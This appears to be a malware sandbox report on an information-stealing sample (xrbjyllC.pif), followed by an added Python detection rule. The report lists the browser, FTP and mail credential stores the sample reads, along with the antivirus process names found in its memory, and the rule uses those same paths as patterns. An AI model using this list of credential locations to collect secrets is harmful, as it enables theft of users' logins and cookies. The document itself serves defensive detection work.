Source: C:\Users\Public\Libraries\xrbjyllC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031C920C GetLocalTime, 3_2_031C920C
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Code function: 13_2_0040BBD4 GetTimeZoneInformation, 13_2_0040BBD4
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 3_2_031CB78C GetVersionExA, 3_2_031CB78C
Source: C:\Users\Public\Libraries\xrbjyllC.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\Public\Libraries\xrbjyllC.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\Public\Libraries\xrbjyllC.pif File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
(The report lists the WinSCP, Thunderbird, Windows Messaging Subsystem and IncrediMail rows several times, the same access being recorded under each xrbjyllC.pif process; the verbatim repeats are collapsed above.)
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
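The Key opened / File opened entries in this section show one process, C:\Users\Public\Libraries\xrbjyllC.pif, reading WinSCP's saved-sessions key, the Chrome and Edge login databases and Chrome cookies, Firefox, Cyberfox and BlackHawk profile files, FTP Navigator's site list, Thunderbird's profile file, the MAPI profile key and IncrediMail identities. No legitimate program reads all of those, so the detection signal is the breadth of unrelated credential stores touched by a single image, not any one path. The Python below is an added example, not part of the sandbox report: it runs that logic over constructed file-open and registry-open events modelled on the rows above, with benign noise mixed in. The owner-application names it uses to exempt a browser or mail client reading its own store are assumptions.

```python
"""
Added example (not from the sandbox report): flag a process that opens several
unrelated credential stores, using the store locations this report shows
xrbjyllC.pif touching. The event records below are constructed telemetry.
"""
from collections import defaultdict
from fnmatch import fnmatchcase

# Store locations from the report, generalised to glob patterns (user profile
# directory and browser/Firefox profile directory names wildcarded).
CREDENTIAL_STORES = {
    "winscp_sessions":      r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    "chrome_login_data":    r"C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Login Data",
    "chrome_cookies":       r"C:\Users\*\AppData\Local\Google\Chrome\User Data\*\Network\Cookies",
    "edge_login_data":      r"C:\Users\*\AppData\Local\Microsoft\Edge\User Data\*\Login Data",
    "firefox_profiles":     r"C:\Users\*\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    "firefox_cookies":      r"C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite",
    "thunderbird_profiles": r"C:\Users\*\AppData\Roaming\Thunderbird\profiles.ini",
    "ftp_navigator_list":   r"C:\FTP Navigator\Ftplist.txt",
    "mapi_profiles":        r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    "incredimail_ids":      r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
}

# Image names allowed to read their own store (assumed owner names; an empty
# set means every access is reported). Matching on the image name alone is
# spoofable, so a production rule would also check the signer or file hash.
STORE_OWNERS = {
    "winscp_sessions": {"winscp.exe"},
    "chrome_login_data": {"chrome.exe"}, "chrome_cookies": {"chrome.exe"},
    "edge_login_data": {"msedge.exe"},
    "firefox_profiles": {"firefox.exe"}, "firefox_cookies": {"firefox.exe"},
    "thunderbird_profiles": {"thunderbird.exe"},
    "ftp_navigator_list": set(), "mapi_profiles": {"outlook.exe"},
    "incredimail_ids": set(),
}


def classify_target(target):
    """Return the store a registry key or file path belongs to, else None."""
    t = target.lower()
    for store, pattern in CREDENTIAL_STORES.items():
        if fnmatchcase(t, pattern.lower()):
            return store
    return None


def analyze(events, threshold=3):
    """events: iterable of (pid, image_path, operation, target).

    Returns {pid: {"image", "stores", "flagged"}} for every process that
    touched at least one store it does not own; "flagged" is set once the
    number of distinct stores reaches `threshold`.
    """
    touched, images = defaultdict(set), {}
    for pid, image, _operation, target in events:
        store = classify_target(target)
        if store is None:
            continue
        basename = image.rsplit("\\", 1)[-1].lower()
        if basename in STORE_OWNERS[store]:
            continue  # the application reading its own data
        touched[pid].add(store)
        images[pid] = image
    return {pid: {"image": images[pid], "stores": sorted(stores),
                  "flagged": len(stores) >= threshold}
            for pid, stores in touched.items()}


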